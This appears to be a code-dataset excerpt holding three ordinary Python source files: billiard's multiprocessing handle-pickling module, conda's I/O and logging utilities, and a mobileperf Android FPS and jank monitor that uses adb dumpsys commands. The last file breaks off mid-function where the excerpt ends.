source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
reduction.py
|
#
# Module to allow connection and socket objects to be transferred
# between processes
#
# multiprocessing/reduction.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
from __future__ import absolute_import
__all__ = []
import os
import sys
import socket
import threading
from . import current_process
from ._ext import _billiard, win32
from .forking import Popen, duplicate, close, ForkingPickler
from .util import register_after_fork, debug, sub_debug
from .connection import Client, Listener
if not(sys.platform == 'win32' or hasattr(_billiard, 'recvfd')):
raise ImportError('pickling of connections not supported')
# globals set later
_listener = None
_lock = None
_cache = set()
#
# Platform specific definitions
#
if sys.platform == 'win32':
# XXX Should this subprocess import be here?
import _subprocess # noqa
def send_handle(conn, handle, destination_pid):
process_handle = win32.OpenProcess(
win32.PROCESS_ALL_ACCESS, False, destination_pid
)
try:
new_handle = duplicate(handle, process_handle)
conn.send(new_handle)
finally:
close(process_handle)
def recv_handle(conn):
return conn.recv()
else:
def send_handle(conn, handle, destination_pid): # noqa
_billiard.sendfd(conn.fileno(), handle)
def recv_handle(conn): # noqa
return _billiard.recvfd(conn.fileno())
#
# Support for a per-process server thread which caches pickled handles
#
def _reset(obj):
global _lock, _listener, _cache
for h in _cache:
close(h)
_cache.clear()
_lock = threading.Lock()
_listener = None
_reset(None)
register_after_fork(_reset, _reset)
def _get_listener():
global _listener
if _listener is None:
_lock.acquire()
try:
if _listener is None:
debug('starting listener and thread for sending handles')
_listener = Listener(authkey=current_process().authkey)
t = threading.Thread(target=_serve)
t.daemon = True
t.start()
finally:
_lock.release()
return _listener
def _serve():
from .util import is_exiting, sub_warning
while 1:
try:
conn = _listener.accept()
handle_wanted, destination_pid = conn.recv()
_cache.remove(handle_wanted)
send_handle(conn, handle_wanted, destination_pid)
close(handle_wanted)
conn.close()
except:
if not is_exiting():
sub_warning('thread for sharing handles raised exception',
exc_info=True)
#
# Functions to be used for pickling/unpickling objects with handles
#
def reduce_handle(handle):
if Popen.thread_is_spawning():
return (None, Popen.duplicate_for_child(handle), True)
dup_handle = duplicate(handle)
_cache.add(dup_handle)
sub_debug('reducing handle %d', handle)
return (_get_listener().address, dup_handle, False)
def rebuild_handle(pickled_data):
address, handle, inherited = pickled_data
if inherited:
return handle
sub_debug('rebuilding handle %d', handle)
conn = Client(address, authkey=current_process().authkey)
conn.send((handle, os.getpid()))
new_handle = recv_handle(conn)
conn.close()
return new_handle
#
# Register `_billiard.Connection` with `ForkingPickler`
#
def reduce_connection(conn):
rh = reduce_handle(conn.fileno())
return rebuild_connection, (rh, conn.readable, conn.writable)
def rebuild_connection(reduced_handle, readable, writable):
handle = rebuild_handle(reduced_handle)
return _billiard.Connection(
handle, readable=readable, writable=writable
)
ForkingPickler.register(_billiard.Connection, reduce_connection)
#
# Register `socket.socket` with `ForkingPickler`
#
def fromfd(fd, family, type_, proto=0):
s = socket.fromfd(fd, family, type_, proto)
if s.__class__ is not socket.socket:
s = socket.socket(_sock=s)
return s
def reduce_socket(s):
reduced_handle = reduce_handle(s.fileno())
return rebuild_socket, (reduced_handle, s.family, s.type, s.proto)
def rebuild_socket(reduced_handle, family, type_, proto):
fd = rebuild_handle(reduced_handle)
_sock = fromfd(fd, family, type_, proto)
close(fd)
return _sock
ForkingPickler.register(socket.socket, reduce_socket)
#
# Register `_billiard.PipeConnection` with `ForkingPickler`
#
if sys.platform == 'win32':
def reduce_pipe_connection(conn):
rh = reduce_handle(conn.fileno())
return rebuild_pipe_connection, (rh, conn.readable, conn.writable)
def rebuild_pipe_connection(reduced_handle, readable, writable):
handle = rebuild_handle(reduced_handle)
return _billiard.PipeConnection(
handle, readable=readable, writable=writable
)
ForkingPickler.register(_billiard.PipeConnection, reduce_pipe_connection)
|
io.py
|
# -*- coding: utf-8 -*-
# Copyright (C) 2012 Anaconda, Inc
# SPDX-License-Identifier: BSD-3-Clause
from __future__ import absolute_import, division, print_function, unicode_literals
from collections import defaultdict
from concurrent.futures import ProcessPoolExecutor, ThreadPoolExecutor, Executor, Future, _base, as_completed # NOQA
from concurrent.futures.thread import _WorkItem
from contextlib import contextmanager
from enum import Enum
from errno import EPIPE, ESHUTDOWN
from functools import partial, wraps
import sys
if sys.version_info[0] > 2:
# Not used at present.
from io import BytesIO
from itertools import cycle
import json
import logging # lgtm [py/import-and-import-from]
from logging import CRITICAL, Formatter, NOTSET, StreamHandler, WARN, getLogger
import os
from os.path import dirname, isdir, isfile, join
import signal
from threading import Event, Thread, Lock
from time import sleep, time
from .compat import StringIO, iteritems, on_win, encode_environment
from .constants import NULL
from .path import expand
from ..auxlib.decorators import memoizemethod
from ..auxlib.logz import NullHandler
from ..auxlib.type_coercion import boolify
from .._vendor.tqdm import tqdm
log = getLogger(__name__)
class DeltaSecondsFormatter(Formatter):
"""
Logging formatter with additional attributes for run time logging.
Attributes:
`delta_secs`:
Elapsed seconds since last log/format call (or creation of logger).
`relative_created_secs`:
Like `relativeCreated`, time relative to the initialization of the
`logging` module but conveniently scaled to seconds as a `float` value.
"""
def __init__(self, fmt=None, datefmt=None):
self.prev_time = time()
super(DeltaSecondsFormatter, self).__init__(fmt=fmt, datefmt=datefmt)
def format(self, record):
now = time()
prev_time = self.prev_time
self.prev_time = max(self.prev_time, now)
record.delta_secs = now - prev_time
record.relative_created_secs = record.relativeCreated / 1000
return super(DeltaSecondsFormatter, self).format(record)
if boolify(os.environ.get('CONDA_TIMED_LOGGING')):
_FORMATTER = DeltaSecondsFormatter(
"%(relative_created_secs) 7.2f %(delta_secs) 7.2f "
"%(levelname)s %(name)s:%(funcName)s(%(lineno)d): %(message)s"
)
else:
_FORMATTER = Formatter(
"%(levelname)s %(name)s:%(funcName)s(%(lineno)d): %(message)s"
)
def dashlist(iterable, indent=2):
return ''.join('\n' + ' ' * indent + '- ' + str(x) for x in iterable)
class ContextDecorator(object):
"""Base class for a context manager class (implementing __enter__() and __exit__()) that also
makes it a decorator.
"""
# TODO: figure out how to improve this pattern so e.g. swallow_broken_pipe doesn't have to be instantiated # NOQA
def __call__(self, f):
@wraps(f)
def decorated(*args, **kwds):
with self:
return f(*args, **kwds)
return decorated
class SwallowBrokenPipe(ContextDecorator):
# Ignore BrokenPipeError and errors related to stdout or stderr being
# closed by a downstream program.
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
if (exc_val
and isinstance(exc_val, EnvironmentError)
and getattr(exc_val, 'errno', None)
and exc_val.errno in (EPIPE, ESHUTDOWN)):
return True
swallow_broken_pipe = SwallowBrokenPipe()
class CaptureTarget(Enum):
"""Constants used for contextmanager captured.
Used similarly like the constants PIPE, STDOUT for stdlib's subprocess.Popen.
"""
STRING = -1
STDOUT = -2
@contextmanager
def env_vars(var_map=None, callback=None, stack_callback=None):
if var_map is None:
var_map = {}
new_var_map = encode_environment(var_map)
saved_vars = {}
for name, value in iteritems(new_var_map):
saved_vars[name] = os.environ.get(name, NULL)
os.environ[name] = value
try:
if callback:
callback()
if stack_callback:
stack_callback(True)
yield
finally:
for name, value in iteritems(saved_vars):
if value is NULL:
del os.environ[name]
else:
os.environ[name] = value
if callback:
callback()
if stack_callback:
stack_callback(False)
@contextmanager
def env_var(name, value, callback=None, stack_callback=None):
# Maybe, but in env_vars, not here:
# from conda.compat import ensure_fs_path_encoding
# d = dict({name: ensure_fs_path_encoding(value)})
d = {name: value}
with env_vars(d, callback=callback, stack_callback=stack_callback) as es:
yield es
@contextmanager
def env_unmodified(callback=None):
with env_vars(callback=callback) as es:
yield es
@contextmanager
def captured(stdout=CaptureTarget.STRING, stderr=CaptureTarget.STRING):
"""Capture outputs of sys.stdout and sys.stderr.
If stdout is STRING, capture sys.stdout as a string,
if stdout is None, do not capture sys.stdout, leaving it untouched,
otherwise redirect sys.stdout to the file-like object given by stdout.
Behave correspondingly for stderr with the exception that if stderr is STDOUT,
redirect sys.stderr to stdout target and set stderr attribute of yielded object to None.
Args:
stdout: capture target for sys.stdout, one of STRING, None, or file-like object
stderr: capture target for sys.stderr, one of STRING, STDOUT, None, or file-like object
Yields:
CapturedText: has attributes stdout, stderr which are either strings, None or the
corresponding file-like function argument.
"""
# NOTE: This function is not thread-safe. Using within multi-threading may cause spurious
# behavior of not returning sys.stdout and sys.stderr back to their 'proper' state
# """
# Context manager to capture the printed output of the code in the with block
#
# Bind the context manager to a variable using `as` and the result will be
# in the stdout property.
#
# >>> from conda.common.io import captured
# >>> with captured() as c:
# ... print('hello world!')
# ...
# >>> c.stdout
# 'hello world!\n'
# """
def write_wrapper(self, to_write):
# This may have to deal with a *lot* of text.
if hasattr(self, 'mode') and 'b' in self.mode:
wanted = bytes
elif sys.version_info[0] == 3 and isinstance(self, BytesIO):
wanted = bytes
else:
# ignore flake8 on this because it finds an error on py3 even though it is guarded
if sys.version_info[0] == 2:
wanted = unicode # NOQA
else:
wanted = str
if not isinstance(to_write, wanted):
if hasattr(to_write, 'decode'):
decoded = to_write.decode('utf-8')
self.old_write(decoded)
elif hasattr(to_write, 'encode'):
b = to_write.encode('utf-8')
self.old_write(b)
else:
self.old_write(to_write)
class CapturedText(object):
pass
# sys.stdout.write(u'unicode out')
# sys.stdout.write(bytes('bytes out', encoding='utf-8'))
# sys.stdout.write(str('str out'))
saved_stdout, saved_stderr = sys.stdout, sys.stderr
if stdout == CaptureTarget.STRING:
outfile = StringIO()
outfile.old_write = outfile.write
outfile.write = partial(write_wrapper, outfile)
sys.stdout = outfile
else:
outfile = stdout
if outfile is not None:
sys.stdout = outfile
if stderr == CaptureTarget.STRING:
errfile = StringIO()
errfile.old_write = errfile.write
errfile.write = partial(write_wrapper, errfile)
sys.stderr = errfile
elif stderr == CaptureTarget.STDOUT:
sys.stderr = errfile = outfile
else:
errfile = stderr
if errfile is not None:
sys.stderr = errfile
c = CapturedText()
log.debug("overtaking stderr and stdout")
try:
yield c
finally:
if stdout == CaptureTarget.STRING:
c.stdout = outfile.getvalue()
else:
c.stdout = outfile
if stderr == CaptureTarget.STRING:
c.stderr = errfile.getvalue()
elif stderr == CaptureTarget.STDOUT:
c.stderr = None
else:
c.stderr = errfile
sys.stdout, sys.stderr = saved_stdout, saved_stderr
log.debug("stderr and stdout yielding back")
@contextmanager
def argv(args_list):
saved_args = sys.argv
sys.argv = args_list
try:
yield
finally:
sys.argv = saved_args
@contextmanager
def _logger_lock():
logging._acquireLock()
try:
yield
finally:
logging._releaseLock()
@contextmanager
def disable_logger(logger_name):
logr = getLogger(logger_name)
_lvl, _dsbld, _prpgt = logr.level, logr.disabled, logr.propagate
null_handler = NullHandler()
with _logger_lock():
logr.addHandler(null_handler)
logr.setLevel(CRITICAL + 1)
logr.disabled, logr.propagate = True, False
try:
yield
finally:
with _logger_lock():
logr.removeHandler(null_handler) # restore list logr.handlers
logr.level, logr.disabled = _lvl, _dsbld
logr.propagate = _prpgt
@contextmanager
def stderr_log_level(level, logger_name=None):
logr = getLogger(logger_name)
_hndlrs, _lvl, _dsbld, _prpgt = logr.handlers, logr.level, logr.disabled, logr.propagate
handler = StreamHandler(sys.stderr)
handler.name = 'stderr'
handler.setLevel(level)
handler.setFormatter(_FORMATTER)
with _logger_lock():
logr.setLevel(level)
logr.handlers, logr.disabled, logr.propagate = [], False, False
logr.addHandler(handler)
logr.setLevel(level)
try:
yield
finally:
with _logger_lock():
logr.handlers, logr.level, logr.disabled = _hndlrs, _lvl, _dsbld
logr.propagate = _prpgt
def attach_stderr_handler(level=WARN, logger_name=None, propagate=False, formatter=None):
# get old stderr logger
logr = getLogger(logger_name)
old_stderr_handler = next((handler for handler in logr.handlers if handler.name == 'stderr'),
None)
# create new stderr logger
new_stderr_handler = StreamHandler(sys.stderr)
new_stderr_handler.name = 'stderr'
new_stderr_handler.setLevel(level)
new_stderr_handler.setFormatter(formatter or _FORMATTER)
# do the switch
with _logger_lock():
if old_stderr_handler:
logr.removeHandler(old_stderr_handler)
logr.addHandler(new_stderr_handler)
logr.setLevel(NOTSET)
logr.propagate = propagate
def timeout(timeout_secs, func, *args, **kwargs):
"""Enforce a maximum time for a callable to complete.
Not yet implemented on Windows.
"""
default_return = kwargs.pop('default_return', None)
if on_win:
# Why does Windows have to be so difficult all the time? Kind of gets old.
# Guess we'll bypass Windows timeouts for now.
try:
return func(*args, **kwargs)
except KeyboardInterrupt: # pragma: no cover
return default_return
else:
class TimeoutException(Exception):
pass
def interrupt(signum, frame):
raise TimeoutException()
signal.signal(signal.SIGALRM, interrupt)
signal.alarm(timeout_secs)
try:
ret = func(*args, **kwargs)
signal.alarm(0)
return ret
except (TimeoutException, KeyboardInterrupt): # pragma: no cover
return default_return
class Spinner(object):
"""
Args:
message (str):
A message to prefix the spinner with. The string ': ' is automatically appended.
enabled (bool):
If False, usage is a no-op.
json (bool):
If True, will not output non-json to stdout.
"""
# spinner_cycle = cycle("⠋⠙⠹⠸⠼⠴⠦⠧⠇⠏")
spinner_cycle = cycle('/-\\|')
def __init__(self, message, enabled=True, json=False, fail_message="failed\n"):
self.message = message
self.enabled = enabled
self.json = json
self._stop_running = Event()
self._spinner_thread = Thread(target=self._start_spinning)
self._indicator_length = len(next(self.spinner_cycle)) + 1
self.fh = sys.stdout
self.show_spin = enabled and not json and hasattr(self.fh, "isatty") and self.fh.isatty()
self.fail_message = fail_message
def start(self):
if self.show_spin:
self._spinner_thread.start()
elif not self.json:
self.fh.write("...working... ")
self.fh.flush()
def stop(self):
if self.show_spin:
self._stop_running.set()
self._spinner_thread.join()
self.show_spin = False
def _start_spinning(self):
try:
while not self._stop_running.is_set():
self.fh.write(next(self.spinner_cycle) + ' ')
self.fh.flush()
sleep(0.10)
self.fh.write('\b' * self._indicator_length)
except EnvironmentError as e:
if e.errno in (EPIPE, ESHUTDOWN):
self.stop()
else:
raise
@swallow_broken_pipe
def __enter__(self):
if not self.json:
sys.stdout.write("%s: " % self.message)
sys.stdout.flush()
self.start()
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop()
if not self.json:
with swallow_broken_pipe:
if exc_type or exc_val:
sys.stdout.write(self.fail_message)
else:
sys.stdout.write("done\n")
sys.stdout.flush()
class ProgressBar(object):
def __init__(self, description, enabled=True, json=False):
"""
Args:
description (str):
The name of the progress bar, shown on left side of output.
enabled (bool):
If False, usage is a no-op.
json (bool):
If true, outputs json progress to stdout rather than a progress bar.
Currently, the json format assumes this is only used for "fetch", which
maintains backward compatibility with conda 4.3 and earlier behavior.
"""
self.description = description
self.enabled = enabled
self.json = json
if json:
pass
elif enabled:
bar_format = "{desc}{bar} | {percentage:3.0f}% "
try:
self.pbar = tqdm(desc=description, bar_format=bar_format, ascii=True, total=1,
file=sys.stdout)
except EnvironmentError as e:
if e.errno in (EPIPE, ESHUTDOWN):
self.enabled = False
else:
raise
def update_to(self, fraction):
try:
if self.json and self.enabled:
sys.stdout.write('{"fetch":"%s","finished":false,"maxval":1,"progress":%f}\n\0'
% (self.description, fraction))
elif self.enabled:
self.pbar.update(fraction - self.pbar.n)
except EnvironmentError as e:
if e.errno in (EPIPE, ESHUTDOWN):
self.enabled = False
else:
raise
def finish(self):
self.update_to(1)
@swallow_broken_pipe
def close(self):
if self.enabled and self.json:
sys.stdout.write('{"fetch":"%s","finished":true,"maxval":1,"progress":1}\n\0'
% self.description)
sys.stdout.flush()
elif self.enabled:
self.pbar.close()
# use this for debugging, because ProcessPoolExecutor isn't pdb/ipdb friendly
class DummyExecutor(Executor):
def __init__(self):
self._shutdown = False
self._shutdownLock = Lock()
def submit(self, fn, *args, **kwargs):
with self._shutdownLock:
if self._shutdown:
raise RuntimeError('cannot schedule new futures after shutdown')
f = Future()
try:
result = fn(*args, **kwargs)
except BaseException as e:
f.set_exception(e)
else:
f.set_result(result)
return f
def map(self, func, *iterables):
for iterable in iterables:
for thing in iterable:
yield func(thing)
def shutdown(self, wait=True):
with self._shutdownLock:
self._shutdown = True
class ThreadLimitedThreadPoolExecutor(ThreadPoolExecutor):
def __init__(self, max_workers=10):
super(ThreadLimitedThreadPoolExecutor, self).__init__(max_workers)
def submit(self, fn, *args, **kwargs):
"""
This is an exact reimplementation of the `submit()` method on the parent class, except
with an added `try/except` around `self._adjust_thread_count()`. So long as there is at
least one living thread, this thread pool will not throw an exception if threads cannot
be expanded to `max_workers`.
In the implementation, we use "protected" attributes from concurrent.futures (`_base`
and `_WorkItem`). Consider vendoring the whole concurrent.futures library
as an alternative to these protected imports.
https://github.com/agronholm/pythonfutures/blob/3.2.0/concurrent/futures/thread.py#L121-L131 # NOQA
https://github.com/python/cpython/blob/v3.6.4/Lib/concurrent/futures/thread.py#L114-L124
"""
with self._shutdown_lock:
if self._shutdown:
raise RuntimeError('cannot schedule new futures after shutdown')
f = _base.Future()
w = _WorkItem(f, fn, args, kwargs)
self._work_queue.put(w)
try:
self._adjust_thread_count()
except RuntimeError:
# RuntimeError: can't start new thread
# See https://github.com/conda/conda/issues/6624
if len(self._threads) > 0:
# It's ok to not be able to start new threads if we already have at least
# one thread alive.
pass
else:
raise
return f
as_completed = as_completed
def get_instrumentation_record_file():
default_record_file = join('~', '.conda', 'instrumentation-record.csv')
return expand(os.environ.get("CONDA_INSTRUMENTATION_RECORD_FILE", default_record_file))
class time_recorder(ContextDecorator): # pragma: no cover
record_file = get_instrumentation_record_file()
start_time = None
total_call_num = defaultdict(int)
total_run_time = defaultdict(float)
def __init__(self, entry_name=None, module_name=None):
self.entry_name = entry_name
self.module_name = module_name
def _set_entry_name(self, f):
if self.entry_name is None:
if hasattr(f, '__qualname__'):
entry_name = f.__qualname__
else:
entry_name = ':' + f.__name__
if self.module_name:
entry_name = '.'.join((self.module_name, entry_name))
self.entry_name = entry_name
def __call__(self, f):
self._set_entry_name(f)
return super(time_recorder, self).__call__(f)
def __enter__(self):
enabled = os.environ.get('CONDA_INSTRUMENTATION_ENABLED')
if enabled and boolify(enabled):
self.start_time = time()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if self.start_time:
entry_name = self.entry_name
end_time = time()
run_time = end_time - self.start_time
self.total_call_num[entry_name] += 1
self.total_run_time[entry_name] += run_time
self._ensure_dir()
with open(self.record_file, 'a') as fh:
fh.write("%s,%f\n" % (entry_name, run_time))
# total_call_num = self.total_call_num[entry_name]
# total_run_time = self.total_run_time[entry_name]
# log.debug('%s %9.3f %9.3f %d', entry_name, run_time, total_run_time, total_call_num)
@classmethod
def log_totals(cls):
enabled = os.environ.get('CONDA_INSTRUMENTATION_ENABLED')
if not (enabled and boolify(enabled)):
return
log.info('=== time_recorder total time and calls ===')
for entry_name in sorted(cls.total_run_time.keys()):
log.info(
'TOTAL %9.3f % 9d %s',
cls.total_run_time[entry_name],
cls.total_call_num[entry_name],
entry_name,
)
@memoizemethod
def _ensure_dir(self):
if not isdir(dirname(self.record_file)):
os.makedirs(dirname(self.record_file))
def print_instrumentation_data(): # pragma: no cover
record_file = get_instrumentation_record_file()
grouped_data = defaultdict(list)
final_data = {}
if not isfile(record_file):
return
with open(record_file) as fh:
for line in fh:
entry_name, total_time = line.strip().split(',')
grouped_data[entry_name].append(float(total_time))
for entry_name in sorted(grouped_data):
all_times = grouped_data[entry_name]
counts = len(all_times)
total_time = sum(all_times)
average_time = total_time / counts
final_data[entry_name] = {
'counts': counts,
'total_time': total_time,
'average_time': average_time,
}
print(json.dumps(final_data, sort_keys=True, indent=2, separators=(',', ': ')))
if __name__ == "__main__":
print_instrumentation_data()
|
fps.py
|
# -*- coding: utf-8 -*-
'''
@author: look
@copyright: 1999-2020 Alibaba.com. All rights reserved.
@license: Apache Software License 2.0
@contact: 390125133@qq.com
'''
'''FPS监控器
'''
import queue
import datetime
import time
import re
import threading
import os,sys
import copy
import csv
import traceback
BaseDir=os.path.dirname(__file__)
sys.path.append(os.path.join(BaseDir,'../..'))
from mobileperf.common.basemonitor import Monitor
from mobileperf.android.tools.androiddevice import AndroidDevice
from mobileperf.common.log import logger
from mobileperf.common.utils import TimeUtils
from mobileperf.android.globaldata import RuntimeData
class SurfaceStatsCollector(object):
'''Collects surface stats for a SurfaceView from the output of SurfaceFlinger
'''
def __init__(self, device, frequency,package_name,fps_queue,jank_threshold,use_legacy = False):
self.device = device
self.frequency = frequency
self.package_name = package_name
self.jank_threshold = jank_threshold /1000.0 # 内部的时间戳是秒为单位
self.use_legacy_method = use_legacy
self.surface_before = 0
self.last_timestamp = 0
self.data_queue = queue.Queue()
self.stop_event = threading.Event()
self.focus_window = None
# queue 上报线程用
self.fps_queue = fps_queue
def start(self,start_time):
'''打开SurfaceStatsCollector
'''
if not self.use_legacy_method and self._clear_surfaceflinger_latency_data():
try:
self.focus_window = self.get_focus_activity()
# 如果self.focus_window里包含字符'$',必须将其转义
if (self.focus_window.find('$') != -1):
self.focus_window = self.focus_window.replace('$','\$')
except:
logger.warn(u'无法动态获取当前Activity名称,使用page_flip统计全屏帧率!')
self.use_legacy_method = True
self.surface_before = self._get_surface_stats_legacy()
else:
logger.debug("dumpsys SurfaceFlinger --latency-clear is none")
self.use_legacy_method = True
self.surface_before = self._get_surface_stats_legacy()
self.collector_thread = threading.Thread(target=self._collector_thread)
self.collector_thread.start()
self.calculator_thread = threading.Thread(target=self._calculator_thread,args=(start_time,))
self.calculator_thread.start()
def stop(self):
'''结束SurfaceStatsCollector
'''
if self.collector_thread:
self.stop_event.set()
self.collector_thread.join()
self.collector_thread = None
if self.fps_queue:
self.fps_queue.task_done()
def get_focus_activity(self):
'''通过dumpsys window windows获取activity名称 window名?
'''
return self.device.adb.get_focus_activity()
def _calculate_results(self, refresh_period, timestamps):
"""Returns a list of SurfaceStatsCollector.Result.
不少手机第一列 第三列 数字完全相同
"""
frame_count = len(timestamps)
if frame_count ==0:
fps = 0
jank = 0
elif frame_count == 1:
fps = 1
jank = 0
else:
seconds = timestamps[-1][1] - timestamps[0][1]
if seconds > 0:
fps = int(round((frame_count - 1) / seconds))
jank =self._calculate_janky(timestamps)
else:
fps = 1
jank = 0
return fps,jank
def _calculate_janky(self,timestamps):
tempstamp = 0
#统计丢帧卡顿
jank = 0
for timestamp in timestamps:
if tempstamp == 0:
tempstamp = timestamp[1]
continue
#绘制帧耗时
costtime = timestamp[1] - tempstamp
#耗时大于阈值10个时钟周期,用户能感受到卡顿感
if costtime > self.jank_threshold:
jank = jank + 1
tempstamp = timestamp[1]
return jank
def _calculator_thread(self,start_time):
'''处理surfaceflinger数据
'''
fps_file = os.path.join(RuntimeData.package_save_path, 'fps.csv')
if self.use_legacy_method:
fps_title = ['datetime', 'fps']
else:
fps_title = ['datetime', "activity window", 'fps', 'jank']
try:
with open(fps_file, 'a+') as df:
csv.writer(df, lineterminator='\n').writerow(fps_title)
if self.fps_queue:
fps_file_dic = {'fps_file': fps_file}
self.fps_queue.put(fps_file_dic)
except RuntimeError as e:
logger.exception(e)
while True:
try:
data = self.data_queue.get()
if isinstance(data, str) and data == 'Stop':
break
before = time.time()
if self.use_legacy_method:
td = data['timestamp'] - self.surface_before['timestamp']
seconds = td.seconds + td.microseconds / 1e6
frame_count = (data['page_flip_count'] -
self.surface_before['page_flip_count'])
fps = int(round(frame_count / seconds))
if fps>60:
fps = 60
self.surface_before = data
logger.debug('FPS:%2s'%fps)
tmp_list = [TimeUtils.getCurrentTimeUnderline(),fps]
try:
with open(fps_file, 'a+') as f:
# tmp_list[0] = TimeUtils.formatTimeStamp(tmp_list[0])
csv.writer(f, lineterminator='\n').writerow(tmp_list)
except RuntimeError as e:
logger.exception(e)
else:
refresh_period = data[0]
timestamps = data[1]
collect_time = data[2]
fps,jank = self._calculate_results(refresh_period, timestamps)
logger.debug('FPS:%2s Jank:%s'%(fps,jank))
fps_list=[collect_time,self.focus_window,fps,jank]
if self.fps_queue:
self.fps_queue.put(fps_list)
if not self.fps_queue:#为了让单个脚本运行时保存数据
try:
with open(fps_file, 'a+') as f:
tmp_list = copy.deepcopy(fps_list)
tmp_list[0] = TimeUtils.formatTimeStamp(tmp_list[0])
csv.writer(f, lineterminator='\n').writerow(tmp_list)
except RuntimeError as e:
logger.exception(e)
time_consume = time.time() - before
delta_inter = self.frequency - time_consume
if delta_inter > 0:
time.sleep(delta_inter)
except:
logger.error("an exception hanpend in fps _calculator_thread ,reason unkown!")
s = traceback.format_exc()
logger.debug(s)
if self.fps_queue:
self.fps_queue.task_done()
def _collector_thread(self):
'''收集surfaceflinger数据
用了两种方式:use_legacy_method 为ture时,需要root权限:
service call SurfaceFlinger 1013 得到帧数
为false,dumpsys SurfaceFlinger --latency
Android 8.0 dumpsys SurfaceFlinger 没有内容
则用dumpsys gfxinfo package_name framestats
'''
is_first = True
while not self.stop_event.is_set():
try:
before = time.time()
if self.use_legacy_method:
surface_state = self._get_surface_stats_legacy()
if surface_state:
self.data_queue.put(surface_state)
else:
timestamps = []
refresh_period, new_timestamps = self._get_surfaceflinger_frame_data()
if refresh_period is None or new_timestamps is None:
# activity发生变化,旧的activity不存时,取的时间戳为空,
self.focus_window = self.get_focus_activity()
logger.debug("refresh_period is None or timestamps is None")
continue
# 计算不重复的帧
timestamps += [timestamp for timestamp in new_timestamps
if timestamp[1] > self.last_timestamp]
if len(timestamps):
first_timestamp = [[0, self.last_timestamp, 0]]
if not is_first:
timestamps = first_timestamp + timestamps
self.last_timestamp = timestamps[-1][1]
is_first = False
else:
# 两种情况:1)activity发生变化,但旧的activity仍然存时,取的时间戳不为空,但时间全部小于等于last_timestamp
# 2)activity没有发生变化,也没有任何刷新
is_first = True
cur_focus_window = self.get_focus_activity()
if self.focus_window != cur_focus_window:
self.focus_window = cur_focus_window
continue
logger.debug(timestamps)
self.data_queue.put((refresh_period, timestamps,time.time()))
time_consume = time.time() - before
delta_inter = self.frequency - time_consume
if delta_inter > 0:
time.sleep(delta_inter)
except:
logger.error("an exception hanpend in fps _collector_thread , reason unkown!")
s = traceback.format_exc()
logger.debug(s)
if self.fps_queue:
self.fps_queue.task_done()
self.data_queue.put(u'Stop')
def _clear_surfaceflinger_latency_data(self):
"""Clears the SurfaceFlinger latency data.
Returns:
True if SurfaceFlinger latency is supported by the device, otherwise
False.
"""
# The command returns nothing if it is supported, otherwise returns many
# lines of result just like 'dumpsys SurfaceFlinger'.
if self.focus_window == None:
results = self.device.adb.run_shell_cmd(
'dumpsys SurfaceFlinger --latency-clear')
else:
results = self.device.adb.run_shell_cmd(
'dumpsys SurfaceFlinger --latency-clear %s' % self.focus_window)
return not len(results)
def _get_surfaceflinger_frame_data(self):
"""Returns collected SurfaceFlinger frame timing data.
return:(16.6,[[t1,t2,t3],[t4,t5,t6]])
Returns:
A tuple containing:
- The display's nominal refresh period in seconds.
- A list of timestamps signifying frame presentation times in seconds.
The return value may be (None, None) if there was no data collected (for
example, if the app was closed before the collector thread has finished).
"""
# shell dumpsys SurfaceFlinger --latency <window name>
# prints some information about the last 128 frames displayed in
# that window.
# The data returned looks like this:
# 16954612
# 7657467895508 7657482691352 7657493499756
# 7657484466553 7657499645964 7657511077881
# 7657500793457 7657516600576 7657527404785
# (...)
#
# The first line is the refresh period (here 16.95 ms), it is followed
# by 128 lines w/ 3 timestamps in nanosecond each:
# A) when the app started to draw
# B) the vsync immediately preceding SF submitting the frame to the h/w
# C) timestamp immediately after SF submitted that frame to the h/w
#
# The difference between the 1st and 3rd timestamp is the frame-latency.
# An interesting data is when the frame latency crosses a refresh period
# boundary, this can be calculated this way:
#
# ceil((C - A) / refresh-period)
#
# (each time the number above changes, we have a "jank").
# If this happens a lot during an animation, the animation appears
# janky, even if it runs at 60 fps in average.
#
# Google Pixel 2 android8.0 dumpsys SurfaceFlinger --latency结果
# 16666666
# 0 0 0
# 0 0 0
# 0 0 0
# 0 0 0
# 但华为 荣耀9 android8.0 dumpsys SurfaceFlinger --latency结果是正常的 但数据更新很慢 也不能用来计算fps
# 16666666
# 9223372036854775807 3618832932780 9223372036854775807
# 9223372036854775807 3618849592155 9223372036854775807
# 9223372036854775807 3618866251530 9223372036854775807
# Google Pixel 2 Android8.0 dumpsys SurfaceFlinger --latency window 结果
# C:\Users\luke01>adb -s HT7B81A05143 shell dumpsys SurfaceFlinger --latency com.n
# etease.apm/com.example.sdkapp.TestListView
# 16666666
refresh_period = None
timestamps = []
nanoseconds_per_second = 1e9
pending_fence_timestamp = (1 << 63) - 1
if self.device.adb.get_sdk_version() >= 26:
results = self.device.adb.run_shell_cmd(
'dumpsys SurfaceFlinger --latency %s'%self.focus_window)
results = results.replace("\r\n","\n").splitlines()
refresh_period = int(results[0]) / nanoseconds_per_second
results = self.device.adb.run_shell_cmd('dumpsys gfxinfo %s framestats'%self.package_name)
# logger.debug(results)
# 把dumpsys gfxinfo package_name framestats的结果封装成 dumpsys SurfaceFlinger --latency的结果
# 方便后面计算fps jank统一处理
results = results.replace("\r\n","\n").splitlines()
if not len(results):
return (None, None)
isHaveFoundWindow = False
PROFILEDATA_line = 0
for line in results:
if not isHaveFoundWindow:
if "Window" in line and self.focus_window in line:
isHaveFoundWindow = True
# logger.debug("Window line:"+line)
if not isHaveFoundWindow:
continue
if "PROFILEDATA" in line:
PROFILEDATA_line +=1
fields = []
fields = line.split(",")
if fields and '0' == fields[0]:
# logger.debug(line)
# 获取INTENDED_VSYNC VSYNC FRAME_COMPLETED时间 利用VSYNC计算fps jank
timestamp = [int(fields[1]),int(fields[2]),int(fields[13])]
if timestamp[1] == pending_fence_timestamp:
continue
timestamp = [_timestamp / nanoseconds_per_second for _timestamp in timestamp]
timestamps.append(timestamp)
# 如果到了下一个窗口,退出
if 2 == PROFILEDATA_line:
break
else:
results = self.device.adb.run_shell_cmd(
'dumpsys SurfaceFlinger --latency %s'%self.focus_window)
results = results.replace("\r\n","\n").splitlines()
logger.debug("dumpsys SurfaceFlinger --latency result:")
logger.debug(results)
if not len(results):
return (None, None)
